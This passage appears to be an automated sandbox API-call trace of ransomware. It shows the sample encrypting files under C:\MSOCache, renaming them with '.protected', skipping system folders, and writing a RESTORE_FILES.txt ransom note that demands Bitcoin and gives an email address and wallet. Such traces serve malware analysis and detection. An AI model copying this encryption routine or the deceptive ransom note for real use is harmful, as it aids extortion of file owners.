Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.146] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0062.146] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.155] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.155] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.156] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.156] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.164] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.164] CloseHandle (hObject=0xb4) returned 1 [0062.164] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0062.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0062.165] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0062.165] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0062.165] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0062.165] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0062.165] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0062.165] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0062.166] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0062.166] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0062.166] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0062.166] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0062.166] CloseHandle (hObject=0xa4) returned 1 [0062.166] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0062.166] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0062.166] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 66 [0062.166] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0062.166] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0062.166] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*") returned 68 [0062.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0062.173] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0062.173] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0062.173] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0062.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.174] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.174] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.174] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0062.174] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0062.174] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0062.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.174] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.174] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.174] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.174] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.174] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.175] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0062.176] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.182] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.182] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.182] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.182] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.205] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.205] CloseHandle (hObject=0xb4) returned 1 [0062.205] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0062.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0062.205] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0062.206] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0062.206] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0062.206] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0062.206] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0062.206] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.206] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.206] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0062.206] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0062.233] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.233] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0062.234] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.234] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.234] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.234] CloseHandle (hObject=0xb4) returned 1 [0062.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0062.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0062.235] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0062.236] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0062.236] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0062.236] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0062.236] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0062.236] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.236] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.236] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0062.236] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.448] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.448] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.449] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.449] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.502] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.537] CloseHandle (hObject=0xb4) returned 1 [0062.538] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0062.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0062.542] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0062.542] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.542] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0062.542] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0062.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0062.543] lstrlenW 